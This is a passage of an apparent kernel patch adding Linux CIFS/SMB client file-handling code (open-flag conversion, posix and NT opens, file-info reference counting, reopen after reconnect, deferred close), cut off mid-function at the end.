++	tcon->status = TID_IN_FILES_INVALIDATE;
++	spin_unlock(&tcon->ses->ses_lock);
++
++	/* list all files open on tree connection and mark them invalid */
++	spin_lock(&tcon->open_file_lock);
++	list_for_each_safe(tmp, tmp1, &tcon->openFileList) {
++		open_file = list_entry(tmp, struct cifsFileInfo, tlist);
++		open_file->invalidHandle = true;
++		open_file->oplock_break_cancelled = true;
++	}
++	spin_unlock(&tcon->open_file_lock);
++
++	invalidate_all_cached_dirs(tcon);
++	spin_lock(&tcon->tc_lock);
++	if (tcon->status == TID_IN_FILES_INVALIDATE)
++		tcon->status = TID_NEED_TCON;
++	spin_unlock(&tcon->tc_lock);
++
++	/*
++	 * BB Add call to invalidate_inodes(sb) for all superblocks mounted
++	 * to this tcon.
++	 */
++}
++
++static inline int cifs_convert_flags(unsigned int flags)
++{
++	if ((flags & O_ACCMODE) == O_RDONLY)
++		return GENERIC_READ;
++	else if ((flags & O_ACCMODE) == O_WRONLY)
++		return GENERIC_WRITE;
++	else if ((flags & O_ACCMODE) == O_RDWR) {
++		/* GENERIC_ALL is too much permission to request
++		   can cause unnecessary access denied on create */
++		/* return GENERIC_ALL; */
++		return (GENERIC_READ | GENERIC_WRITE);
++	}
++
++	return (READ_CONTROL | FILE_WRITE_ATTRIBUTES | FILE_READ_ATTRIBUTES |
++		FILE_WRITE_EA | FILE_APPEND_DATA | FILE_WRITE_DATA |
++		FILE_READ_DATA);
++}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++static u32 cifs_posix_convert_flags(unsigned int flags)
++{
++	u32 posix_flags = 0;
++
++	if ((flags & O_ACCMODE) == O_RDONLY)
++		posix_flags = SMB_O_RDONLY;
++	else if ((flags & O_ACCMODE) == O_WRONLY)
++		posix_flags = SMB_O_WRONLY;
++	else if ((flags & O_ACCMODE) == O_RDWR)
++		posix_flags = SMB_O_RDWR;
++
++	if (flags & O_CREAT) {
++		posix_flags |= SMB_O_CREAT;
++		if (flags & O_EXCL)
++			posix_flags |= SMB_O_EXCL;
++	} else if (flags & O_EXCL)
++		cifs_dbg(FYI, "Application %s pid %d has incorrectly set O_EXCL flag but not O_CREAT on file open. Ignoring O_EXCL\n",
++			 current->comm, current->tgid);
++
++	if (flags & O_TRUNC)
++		posix_flags |= SMB_O_TRUNC;
++	/* be safe and imply O_SYNC for O_DSYNC */
++	if (flags & O_DSYNC)
++		posix_flags |= SMB_O_SYNC;
++	if (flags & O_DIRECTORY)
++		posix_flags |= SMB_O_DIRECTORY;
++	if (flags & O_NOFOLLOW)
++		posix_flags |= SMB_O_NOFOLLOW;
++	if (flags & O_DIRECT)
++		posix_flags |= SMB_O_DIRECT;
++
++	return posix_flags;
++}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++static inline int cifs_get_disposition(unsigned int flags)
++{
++	if ((flags & (O_CREAT | O_EXCL)) == (O_CREAT | O_EXCL))
++		return FILE_CREATE;
++	else if ((flags & (O_CREAT | O_TRUNC)) == (O_CREAT | O_TRUNC))
++		return FILE_OVERWRITE_IF;
++	else if ((flags & O_CREAT) == O_CREAT)
++		return FILE_OPEN_IF;
++	else if ((flags & O_TRUNC) == O_TRUNC)
++		return FILE_OVERWRITE;
++	else
++		return FILE_OPEN;
++}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++int cifs_posix_open(const char *full_path, struct inode **pinode,
++			struct super_block *sb, int mode, unsigned int f_flags,
++			__u32 *poplock, __u16 *pnetfid, unsigned int xid)
++{
++	int rc;
++	FILE_UNIX_BASIC_INFO *presp_data;
++	__u32 posix_flags = 0;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++	struct cifs_fattr fattr;
++	struct tcon_link *tlink;
++	struct cifs_tcon *tcon;
++
++	cifs_dbg(FYI, "posix open %s\n", full_path);
++
++	presp_data = kzalloc(sizeof(FILE_UNIX_BASIC_INFO), GFP_KERNEL);
++	if (presp_data == NULL)
++		return -ENOMEM;
++
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink)) {
++		rc = PTR_ERR(tlink);
++		goto posix_open_ret;
++	}
++
++	tcon = tlink_tcon(tlink);
++	mode &= ~current_umask();
++
++	posix_flags = cifs_posix_convert_flags(f_flags);
++	rc = CIFSPOSIXCreate(xid, tcon, posix_flags, mode, pnetfid, presp_data,
++			     poplock, full_path, cifs_sb->local_nls,
++			     cifs_remap(cifs_sb));
++	cifs_put_tlink(tlink);
++
++	if (rc)
++		goto posix_open_ret;
++
++	if (presp_data->Type == cpu_to_le32(-1))
++		goto posix_open_ret; /* open ok, caller does qpathinfo */
++
++	if (!pinode)
++		goto posix_open_ret; /* caller does not need info */
++
++	cifs_unix_basic_to_fattr(&fattr, presp_data, cifs_sb);
++
++	/* get new inode and set it up */
++	if (*pinode == NULL) {
++		cifs_fill_uniqueid(sb, &fattr);
++		*pinode = cifs_iget(sb, &fattr);
++		if (!*pinode) {
++			rc = -ENOMEM;
++			goto posix_open_ret;
++		}
++	} else {
++		cifs_revalidate_mapping(*pinode);
++		rc = cifs_fattr_to_inode(*pinode, &fattr);
++	}
++
++posix_open_ret:
++	kfree(presp_data);
++	return rc;
++}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++static int cifs_nt_open(const char *full_path, struct inode *inode, struct cifs_sb_info *cifs_sb,
++			struct cifs_tcon *tcon, unsigned int f_flags, __u32 *oplock,
++			struct cifs_fid *fid, unsigned int xid, struct cifs_open_info_data *buf)
++{
++	int rc;
++	int desired_access;
++	int disposition;
++	int create_options = CREATE_NOT_DIR;
++	struct TCP_Server_Info *server = tcon->ses->server;
++	struct cifs_open_parms oparms;
++
++	if (!server->ops->open)
++		return -ENOSYS;
++
++	desired_access = cifs_convert_flags(f_flags);
++
++/*********************************************************************
++ *  open flag mapping table:
++ *
++ *	POSIX Flag            CIFS Disposition
++ *	----------            ----------------
++ *	O_CREAT               FILE_OPEN_IF
++ *	O_CREAT | O_EXCL      FILE_CREATE
++ *	O_CREAT | O_TRUNC     FILE_OVERWRITE_IF
++ *	O_TRUNC               FILE_OVERWRITE
++ *	none of the above     FILE_OPEN
++ *
++ *	Note that there is not a direct match between disposition
++ *	FILE_SUPERSEDE (ie create whether or not file exists although
++ *	O_CREAT | O_TRUNC is similar but truncates the existing
++ *	file rather than creating a new file as FILE_SUPERSEDE does
++ *	(which uses the attributes / metadata passed in on open call)
++ *?
++ *?  O_SYNC is a reasonable match to CIFS writethrough flag
++ *?  and the read write flags match reasonably.  O_LARGEFILE
++ *?  is irrelevant because largefile support is always used
++ *?  by this client. Flags O_APPEND, O_DIRECT, O_DIRECTORY,
++ *	 O_FASYNC, O_NOFOLLOW, O_NONBLOCK need further investigation
++ *********************************************************************/
++
++	disposition = cifs_get_disposition(f_flags);
++
++	/* BB pass O_SYNC flag through on file attributes .. BB */
++
++	/* O_SYNC also has bit for O_DSYNC so following check picks up either */
++	if (f_flags & O_SYNC)
++		create_options |= CREATE_WRITE_THROUGH;
++
++	if (f_flags & O_DIRECT)
++		create_options |= CREATE_NO_BUFFER;
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = desired_access,
++		.create_options = cifs_create_options(cifs_sb, create_options),
++		.disposition = disposition,
++		.path = full_path,
++		.fid = fid,
++	};
++
++	rc = server->ops->open(xid, &oparms, oplock, buf);
++	if (rc)
++		return rc;
++
++	/* TODO: Add support for calling posix query info but with passing in fid */
++	if (tcon->unix_ext)
++		rc = cifs_get_inode_info_unix(&inode, full_path, inode->i_sb,
++					      xid);
++	else
++		rc = cifs_get_inode_info(&inode, full_path, buf, inode->i_sb,
++					 xid, fid);
++
++	if (rc) {
++		server->ops->close(xid, tcon, fid);
++		if (rc == -ESTALE)
++			rc = -EOPENSTALE;
++	}
++
++	return rc;
++}
++
++static bool
++cifs_has_mand_locks(struct cifsInodeInfo *cinode)
++{
++	struct cifs_fid_locks *cur;
++	bool has_locks = false;
++
++	down_read(&cinode->lock_sem);
++	list_for_each_entry(cur, &cinode->llist, llist) {
++		if (!list_empty(&cur->locks)) {
++			has_locks = true;
++			break;
++		}
++	}
++	up_read(&cinode->lock_sem);
++	return has_locks;
++}
++
++void
++cifs_down_write(struct rw_semaphore *sem)
++{
++	while (!down_write_trylock(sem))
++		msleep(10);
++}
++
++static void cifsFileInfo_put_work(struct work_struct *work);
++
++struct cifsFileInfo *cifs_new_fileinfo(struct cifs_fid *fid, struct file *file,
++				       struct tcon_link *tlink, __u32 oplock,
++				       const char *symlink_target)
++{
++	struct dentry *dentry = file_dentry(file);
++	struct inode *inode = d_inode(dentry);
++	struct cifsInodeInfo *cinode = CIFS_I(inode);
++	struct cifsFileInfo *cfile;
++	struct cifs_fid_locks *fdlocks;
++	struct cifs_tcon *tcon = tlink_tcon(tlink);
++	struct TCP_Server_Info *server = tcon->ses->server;
++
++	cfile = kzalloc(sizeof(struct cifsFileInfo), GFP_KERNEL);
++	if (cfile == NULL)
++		return cfile;
++
++	fdlocks = kzalloc(sizeof(struct cifs_fid_locks), GFP_KERNEL);
++	if (!fdlocks) {
++		kfree(cfile);
++		return NULL;
++	}
++
++	if (symlink_target) {
++		cfile->symlink_target = kstrdup(symlink_target, GFP_KERNEL);
++		if (!cfile->symlink_target) {
++			kfree(fdlocks);
++			kfree(cfile);
++			return NULL;
++		}
++	}
++
++	INIT_LIST_HEAD(&fdlocks->locks);
++	fdlocks->cfile = cfile;
++	cfile->llist = fdlocks;
++
++	cfile->count = 1;
++	cfile->pid = current->tgid;
++	cfile->uid = current_fsuid();
++	cfile->dentry = dget(dentry);
++	cfile->f_flags = file->f_flags;
++	cfile->invalidHandle = false;
++	cfile->deferred_close_scheduled = false;
++	cfile->tlink = cifs_get_tlink(tlink);
++	INIT_WORK(&cfile->oplock_break, cifs_oplock_break);
++	INIT_WORK(&cfile->put, cifsFileInfo_put_work);
++	INIT_DELAYED_WORK(&cfile->deferred, smb2_deferred_work_close);
++	mutex_init(&cfile->fh_mutex);
++	spin_lock_init(&cfile->file_info_lock);
++
++	cifs_sb_active(inode->i_sb);
++
++	/*
++	 * If the server returned a read oplock and we have mandatory brlocks,
++	 * set oplock level to None.
++	 */
++	if (server->ops->is_read_op(oplock) && cifs_has_mand_locks(cinode)) {
++		cifs_dbg(FYI, "Reset oplock val from read to None due to mand locks\n");
++		oplock = 0;
++	}
++
++	cifs_down_write(&cinode->lock_sem);
++	list_add(&fdlocks->llist, &cinode->llist);
++	up_write(&cinode->lock_sem);
++
++	spin_lock(&tcon->open_file_lock);
++	if (fid->pending_open->oplock != CIFS_OPLOCK_NO_CHANGE && oplock)
++		oplock = fid->pending_open->oplock;
++	list_del(&fid->pending_open->olist);
++
++	fid->purge_cache = false;
++	server->ops->set_fid(cfile, fid, oplock);
++
++	list_add(&cfile->tlist, &tcon->openFileList);
++	atomic_inc(&tcon->num_local_opens);
++
++	/* if readable file instance put first in list*/
++	spin_lock(&cinode->open_file_lock);
++	if (file->f_mode & FMODE_READ)
++		list_add(&cfile->flist, &cinode->openFileList);
++	else
++		list_add_tail(&cfile->flist, &cinode->openFileList);
++	spin_unlock(&cinode->open_file_lock);
++	spin_unlock(&tcon->open_file_lock);
++
++	if (fid->purge_cache)
++		cifs_zap_mapping(inode);
++
++	file->private_data = cfile;
++	return cfile;
++}
++
++struct cifsFileInfo *
++cifsFileInfo_get(struct cifsFileInfo *cifs_file)
++{
++	spin_lock(&cifs_file->file_info_lock);
++	cifsFileInfo_get_locked(cifs_file);
++	spin_unlock(&cifs_file->file_info_lock);
++	return cifs_file;
++}
++
++static void cifsFileInfo_put_final(struct cifsFileInfo *cifs_file)
++{
++	struct inode *inode = d_inode(cifs_file->dentry);
++	struct cifsInodeInfo *cifsi = CIFS_I(inode);
++	struct cifsLockInfo *li, *tmp;
++	struct super_block *sb = inode->i_sb;
++
++	/*
++	 * Delete any outstanding lock records. We'll lose them when the file
++	 * is closed anyway.
++	 */
++	cifs_down_write(&cifsi->lock_sem);
++	list_for_each_entry_safe(li, tmp, &cifs_file->llist->locks, llist) {
++		list_del(&li->llist);
++		cifs_del_lock_waiters(li);
++		kfree(li);
++	}
++	list_del(&cifs_file->llist->llist);
++	kfree(cifs_file->llist);
++	up_write(&cifsi->lock_sem);
++
++	cifs_put_tlink(cifs_file->tlink);
++	dput(cifs_file->dentry);
++	cifs_sb_deactive(sb);
++	kfree(cifs_file->symlink_target);
++	kfree(cifs_file);
++}
++
++static void cifsFileInfo_put_work(struct work_struct *work)
++{
++	struct cifsFileInfo *cifs_file = container_of(work,
++			struct cifsFileInfo, put);
++
++	cifsFileInfo_put_final(cifs_file);
++}
++
++/**
++ * cifsFileInfo_put - release a reference of file priv data
++ *
++ * Always potentially wait for oplock handler. See _cifsFileInfo_put().
++ *
++ * @cifs_file:	cifs/smb3 specific info (eg refcounts) for an open file
++ */
++void cifsFileInfo_put(struct cifsFileInfo *cifs_file)
++{
++	_cifsFileInfo_put(cifs_file, true, true);
++}
++
++/**
++ * _cifsFileInfo_put - release a reference of file priv data
++ *
++ * This may involve closing the filehandle @cifs_file out on the
++ * server. Must be called without holding tcon->open_file_lock,
++ * cinode->open_file_lock and cifs_file->file_info_lock.
++ *
++ * If @wait_for_oplock_handler is true and we are releasing the last
++ * reference, wait for any running oplock break handler of the file
++ * and cancel any pending one.
++ *
++ * @cifs_file:	cifs/smb3 specific info (eg refcounts) for an open file
++ * @wait_oplock_handler: must be false if called from oplock_break_handler
++ * @offload:	not offloaded on close and oplock breaks
++ *
++ */
++void _cifsFileInfo_put(struct cifsFileInfo *cifs_file,
++		       bool wait_oplock_handler, bool offload)
++{
++	struct inode *inode = d_inode(cifs_file->dentry);
++	struct cifs_tcon *tcon = tlink_tcon(cifs_file->tlink);
++	struct TCP_Server_Info *server = tcon->ses->server;
++	struct cifsInodeInfo *cifsi = CIFS_I(inode);
++	struct super_block *sb = inode->i_sb;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++	struct cifs_fid fid = {};
++	struct cifs_pending_open open;
++	bool oplock_break_cancelled;
++
++	spin_lock(&tcon->open_file_lock);
++	spin_lock(&cifsi->open_file_lock);
++	spin_lock(&cifs_file->file_info_lock);
++	if (--cifs_file->count > 0) {
++		spin_unlock(&cifs_file->file_info_lock);
++		spin_unlock(&cifsi->open_file_lock);
++		spin_unlock(&tcon->open_file_lock);
++		return;
++	}
++	spin_unlock(&cifs_file->file_info_lock);
++
++	if (server->ops->get_lease_key)
++		server->ops->get_lease_key(inode, &fid);
++
++	/* store open in pending opens to make sure we don't miss lease break */
++	cifs_add_pending_open_locked(&fid, cifs_file->tlink, &open);
++
++	/* remove it from the lists */
++	list_del(&cifs_file->flist);
++	list_del(&cifs_file->tlist);
++	atomic_dec(&tcon->num_local_opens);
++
++	if (list_empty(&cifsi->openFileList)) {
++		cifs_dbg(FYI, "closing last open instance for inode %p\n",
++			 d_inode(cifs_file->dentry));
++		/*
++		 * In strict cache mode we need invalidate mapping on the last
++		 * close  because it may cause a error when we open this file
++		 * again and get at least level II oplock.
++		 */
++		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_STRICT_IO)
++			set_bit(CIFS_INO_INVALID_MAPPING, &cifsi->flags);
++		cifs_set_oplock_level(cifsi, 0);
++	}
++
++	spin_unlock(&cifsi->open_file_lock);
++	spin_unlock(&tcon->open_file_lock);
++
++	oplock_break_cancelled = wait_oplock_handler ?
++		cancel_work_sync(&cifs_file->oplock_break) : false;
++
++	if (!tcon->need_reconnect && !cifs_file->invalidHandle) {
++		struct TCP_Server_Info *server = tcon->ses->server;
++		unsigned int xid;
++
++		xid = get_xid();
++		if (server->ops->close_getattr)
++			server->ops->close_getattr(xid, tcon, cifs_file);
++		else if (server->ops->close)
++			server->ops->close(xid, tcon, &cifs_file->fid);
++		_free_xid(xid);
++	}
++
++	if (oplock_break_cancelled)
++		cifs_done_oplock_break(cifsi);
++
++	cifs_del_pending_open(&open);
++
++	if (offload)
++		queue_work(fileinfo_put_wq, &cifs_file->put);
++	else
++		cifsFileInfo_put_final(cifs_file);
++}
++
++int cifs_open(struct inode *inode, struct file *file)
++
++{
++	int rc = -EACCES;
++	unsigned int xid;
++	__u32 oplock;
++	struct cifs_sb_info *cifs_sb;
++	struct TCP_Server_Info *server;
++	struct cifs_tcon *tcon;
++	struct tcon_link *tlink;
++	struct cifsFileInfo *cfile = NULL;
++	void *page;
++	const char *full_path;
++	bool posix_open_ok = false;
++	struct cifs_fid fid = {};
++	struct cifs_pending_open open;
++	struct cifs_open_info_data data = {};
++
++	xid = get_xid();
++
++	cifs_sb = CIFS_SB(inode->i_sb);
++	if (unlikely(cifs_forced_shutdown(cifs_sb))) {
++		free_xid(xid);
++		return -EIO;
++	}
++
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink)) {
++		free_xid(xid);
++		return PTR_ERR(tlink);
++	}
++	tcon = tlink_tcon(tlink);
++	server = tcon->ses->server;
++
++	page = alloc_dentry_path();
++	full_path = build_path_from_dentry(file_dentry(file), page);
++	if (IS_ERR(full_path)) {
++		rc = PTR_ERR(full_path);
++		goto out;
++	}
++
++	cifs_dbg(FYI, "inode = 0x%p file flags are 0x%x for %s\n",
++		 inode, file->f_flags, full_path);
++
++	if (file->f_flags & O_DIRECT &&
++	    cifs_sb->mnt_cifs_flags & CIFS_MOUNT_STRICT_IO) {
++		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_BRL)
++			file->f_op = &cifs_file_direct_nobrl_ops;
++		else
++			file->f_op = &cifs_file_direct_ops;
++	}
++
++	/* Get the cached handle as SMB2 close is deferred */
++	rc = cifs_get_readable_path(tcon, full_path, &cfile);
++	if (rc == 0) {
++		if (file->f_flags == cfile->f_flags) {
++			file->private_data = cfile;
++			spin_lock(&CIFS_I(inode)->deferred_lock);
++			cifs_del_deferred_close(cfile);
++			spin_unlock(&CIFS_I(inode)->deferred_lock);
++			goto use_cache;
++		} else {
++			_cifsFileInfo_put(cfile, true, false);
++		}
++	}
++
++	if (server->oplocks)
++		oplock = REQ_OPLOCK;
++	else
++		oplock = 0;
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	if (!tcon->broken_posix_open && tcon->unix_ext &&
++	    cap_unix(tcon->ses) && (CIFS_UNIX_POSIX_PATH_OPS_CAP &
++				le64_to_cpu(tcon->fsUnixInfo.Capability))) {
++		/* can not refresh inode info since size could be stale */
++		rc = cifs_posix_open(full_path, &inode, inode->i_sb,
++				cifs_sb->ctx->file_mode /* ignored */,
++				file->f_flags, &oplock, &fid.netfid, xid);
++		if (rc == 0) {
++			cifs_dbg(FYI, "posix open succeeded\n");
++			posix_open_ok = true;
++		} else if ((rc == -EINVAL) || (rc == -EOPNOTSUPP)) {
++			if (tcon->ses->serverNOS)
++				cifs_dbg(VFS, "server %s of type %s returned unexpected error on SMB posix open, disabling posix open support. Check if server update available.\n",
++					 tcon->ses->ip_addr,
++					 tcon->ses->serverNOS);
++			tcon->broken_posix_open = true;
++		} else if ((rc != -EIO) && (rc != -EREMOTE) &&
++			 (rc != -EOPNOTSUPP)) /* path not found or net err */
++			goto out;
++		/*
++		 * Else fallthrough to retry open the old way on network i/o
++		 * or DFS errors.
++		 */
++	}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++	if (server->ops->get_lease_key)
++		server->ops->get_lease_key(inode, &fid);
++
++	cifs_add_pending_open(&fid, tlink, &open);
++
++	if (!posix_open_ok) {
++		if (server->ops->get_lease_key)
++			server->ops->get_lease_key(inode, &fid);
++
++		rc = cifs_nt_open(full_path, inode, cifs_sb, tcon, file->f_flags, &oplock, &fid,
++				  xid, &data);
++		if (rc) {
++			cifs_del_pending_open(&open);
++			goto out;
++		}
++	}
++
++	cfile = cifs_new_fileinfo(&fid, file, tlink, oplock, data.symlink_target);
++	if (cfile == NULL) {
++		if (server->ops->close)
++			server->ops->close(xid, tcon, &fid);
++		cifs_del_pending_open(&open);
++		rc = -ENOMEM;
++		goto out;
++	}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	if ((oplock & CIFS_CREATE_ACTION) && !posix_open_ok && tcon->unix_ext) {
++		/*
++		 * Time to set mode which we can not set earlier due to
++		 * problems creating new read-only files.
++		 */
++		struct cifs_unix_set_info_args args = {
++			.mode	= inode->i_mode,
++			.uid	= INVALID_UID, /* no change */
++			.gid	= INVALID_GID, /* no change */
++			.ctime	= NO_CHANGE_64,
++			.atime	= NO_CHANGE_64,
++			.mtime	= NO_CHANGE_64,
++			.device	= 0,
++		};
++		CIFSSMBUnixSetFileInfo(xid, tcon, &args, fid.netfid,
++				       cfile->pid);
++	}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++use_cache:
++	fscache_use_cookie(cifs_inode_cookie(file_inode(file)),
++			   file->f_mode & FMODE_WRITE);
++	if (file->f_flags & O_DIRECT &&
++	    (!((file->f_flags & O_ACCMODE) != O_RDONLY) ||
++	     file->f_flags & O_APPEND))
++		cifs_invalidate_cache(file_inode(file),
++				      FSCACHE_INVAL_DIO_WRITE);
++
++out:
++	free_dentry_path(page);
++	free_xid(xid);
++	cifs_put_tlink(tlink);
++	cifs_free_open_info(&data);
++	return rc;
++}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++static int cifs_push_posix_locks(struct cifsFileInfo *cfile);
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++/*
++ * Try to reacquire byte range locks that were released when session
++ * to server was lost.
++ */
++static int
++cifs_relock_file(struct cifsFileInfo *cfile)
++{
++	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
++	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
++	int rc = 0;
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	struct cifs_sb_info *cifs_sb = CIFS_SB(cfile->dentry->d_sb);
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++	down_read_nested(&cinode->lock_sem, SINGLE_DEPTH_NESTING);
++	if (cinode->can_cache_brlcks) {
++		/* can cache locks - no need to relock */
++		up_read(&cinode->lock_sem);
++		return rc;
++	}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	if (cap_unix(tcon->ses) &&
++	    (CIFS_UNIX_FCNTL_CAP & le64_to_cpu(tcon->fsUnixInfo.Capability)) &&
++	    ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOPOSIXBRL) == 0))
++		rc = cifs_push_posix_locks(cfile);
++	else
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++		rc = tcon->ses->server->ops->push_mand_locks(cfile);
++
++	up_read(&cinode->lock_sem);
++	return rc;
++}
++
++static int
++cifs_reopen_file(struct cifsFileInfo *cfile, bool can_flush)
++{
++	int rc = -EACCES;
++	unsigned int xid;
++	__u32 oplock;
++	struct cifs_sb_info *cifs_sb;
++	struct cifs_tcon *tcon;
++	struct TCP_Server_Info *server;
++	struct cifsInodeInfo *cinode;
++	struct inode *inode;
++	void *page;
++	const char *full_path;
++	int desired_access;
++	int disposition = FILE_OPEN;
++	int create_options = CREATE_NOT_DIR;
++	struct cifs_open_parms oparms;
++
++	xid = get_xid();
++	mutex_lock(&cfile->fh_mutex);
++	if (!cfile->invalidHandle) {
++		mutex_unlock(&cfile->fh_mutex);
++		free_xid(xid);
++		return 0;
++	}
++
++	inode = d_inode(cfile->dentry);
++	cifs_sb = CIFS_SB(inode->i_sb);
++	tcon = tlink_tcon(cfile->tlink);
++	server = tcon->ses->server;
++
++	/*
++	 * Can not grab rename sem here because various ops, including those
++	 * that already have the rename sem can end up causing writepage to get
++	 * called and if the server was down that means we end up here, and we
++	 * can never tell if the caller already has the rename_sem.
++	 */
++	page = alloc_dentry_path();
++	full_path = build_path_from_dentry(cfile->dentry, page);
++	if (IS_ERR(full_path)) {
++		mutex_unlock(&cfile->fh_mutex);
++		free_dentry_path(page);
++		free_xid(xid);
++		return PTR_ERR(full_path);
++	}
++
++	cifs_dbg(FYI, "inode = 0x%p file flags 0x%x for %s\n",
++		 inode, cfile->f_flags, full_path);
++
++	if (tcon->ses->server->oplocks)
++		oplock = REQ_OPLOCK;
++	else
++		oplock = 0;
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	if (tcon->unix_ext && cap_unix(tcon->ses) &&
++	    (CIFS_UNIX_POSIX_PATH_OPS_CAP &
++				le64_to_cpu(tcon->fsUnixInfo.Capability))) {
++		/*
++		 * O_CREAT, O_EXCL and O_TRUNC already had their effect on the
++		 * original open. Must mask them off for a reopen.
++		 */
++		unsigned int oflags = cfile->f_flags &
++						~(O_CREAT | O_EXCL | O_TRUNC);
++
++		rc = cifs_posix_open(full_path, NULL, inode->i_sb,
++				     cifs_sb->ctx->file_mode /* ignored */,
++				     oflags, &oplock, &cfile->fid.netfid, xid);
++		if (rc == 0) {
++			cifs_dbg(FYI, "posix reopen succeeded\n");
++			oparms.reconnect = true;
++			goto reopen_success;
++		}
++		/*
++		 * fallthrough to retry open the old way on errors, especially
++		 * in the reconnect path it is important to retry hard
++		 */
++	}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++	desired_access = cifs_convert_flags(cfile->f_flags);
++
++	/* O_SYNC also has bit for O_DSYNC so following check picks up either */
++	if (cfile->f_flags & O_SYNC)
++		create_options |= CREATE_WRITE_THROUGH;
++
++	if (cfile->f_flags & O_DIRECT)
++		create_options |= CREATE_NO_BUFFER;
++
++	if (server->ops->get_lease_key)
++		server->ops->get_lease_key(inode, &cfile->fid);
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = desired_access,
++		.create_options = cifs_create_options(cifs_sb, create_options),
++		.disposition = disposition,
++		.path = full_path,
++		.fid = &cfile->fid,
++		.reconnect = true,
++	};
++
++	/*
++	 * Can not refresh inode by passing in file_info buf to be returned by
++	 * ops->open and then calling get_inode_info with returned buf since
++	 * file might have write behind data that needs to be flushed and server
++	 * version of file size can be stale. If we knew for sure that inode was
++	 * not dirty locally we could do this.
++	 */
++	rc = server->ops->open(xid, &oparms, &oplock, NULL);
++	if (rc == -ENOENT && oparms.reconnect == false) {
++		/* durable handle timeout is expired - open the file again */
++		rc = server->ops->open(xid, &oparms, &oplock, NULL);
++		/* indicate that we need to relock the file */
++		oparms.reconnect = true;
++	}
++
++	if (rc) {
++		mutex_unlock(&cfile->fh_mutex);
++		cifs_dbg(FYI, "cifs_reopen returned 0x%x\n", rc);
++		cifs_dbg(FYI, "oplock: %d\n", oplock);
++		goto reopen_error_exit;
++	}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++reopen_success:
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++	cfile->invalidHandle = false;
++	mutex_unlock(&cfile->fh_mutex);
++	cinode = CIFS_I(inode);
++
++	if (can_flush) {
++		rc = filemap_write_and_wait(inode->i_mapping);
++		if (!is_interrupt_error(rc))
++			mapping_set_error(inode->i_mapping, rc);
++
++		if (tcon->posix_extensions)
++			rc = smb311_posix_get_inode_info(&inode, full_path, inode->i_sb, xid);
++		else if (tcon->unix_ext)
++			rc = cifs_get_inode_info_unix(&inode, full_path,
++						      inode->i_sb, xid);
++		else
++			rc = cifs_get_inode_info(&inode, full_path, NULL,
++						 inode->i_sb, xid, NULL);
++	}
++	/*
++	 * Else we are writing out data to server already and could deadlock if
++	 * we tried to flush data, and since we do not know if we have data that
++	 * would invalidate the current end of file on the server we can not go
++	 * to the server to get the new inode info.
++	 */
++
++	/*
++	 * If the server returned a read oplock and we have mandatory brlocks,
++	 * set oplock level to None.
++	 */
++	if (server->ops->is_read_op(oplock) && cifs_has_mand_locks(cinode)) {
++		cifs_dbg(FYI, "Reset oplock val from read to None due to mand locks\n");
++		oplock = 0;
++	}
++
++	server->ops->set_fid(cfile, &cfile->fid, oplock);
++	if (oparms.reconnect)
++		cifs_relock_file(cfile);
++
++reopen_error_exit:
++	free_dentry_path(page);
++	free_xid(xid);
++	return rc;
++}
++
++void smb2_deferred_work_close(struct work_struct *work)
++{
++	struct cifsFileInfo *cfile = container_of(work,
++			struct cifsFileInfo, deferred.work);
++
++	spin_lock(&CIFS_I(d_inode(cfile->dentry))->deferred_lock);
++	cifs_del_deferred_close(cfile);
++	cfile->deferred_close_scheduled = false;
++	spin_unlock(&CIFS_I(d_inode(cfile->dentry))->deferred_lock);
++	_cifsFileInfo_put(cfile, true, false);
++}
++
++int cifs_close(struct inode *inode, struct file *file)
++{
++	struct cifsFileInfo *cfile;
++	struct cifsInodeInfo *cinode = CIFS_I(inode);
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct cifs_deferred_close *dclose;
++
++	cifs_fscache_unuse_inode_cookie(inode, file->f_mode & FMODE_WRITE);
++
++	if (file->private_data != NULL) {
++		cfile = file->private_data;
++		file->private_data = NULL;
++		dclose = kmalloc(sizeof(struct cifs_deferred_close), GFP_KERNEL);
++		if ((cinode->oplock == CIFS_CACHE_RHW_FLG) &&
++		    cinode->lease_granted &&
++		    !test_bit(CIFS_INO_CLOSE_ON_LOCK, &cinode->flags) &&
++		    dclose) {
++			if (test_and_clear_bit(CIFS_INO_MODIFIED_ATTR, &cinode->flags)) {
++				inode->i_ctime = inode->i_mtime = current_time(inode);
++			}
++			spin_lock(&cinode->deferred_lock);
++			cifs_add_deferred_close(cfile, dclose);
++			if (cfile->deferred_close_scheduled &&
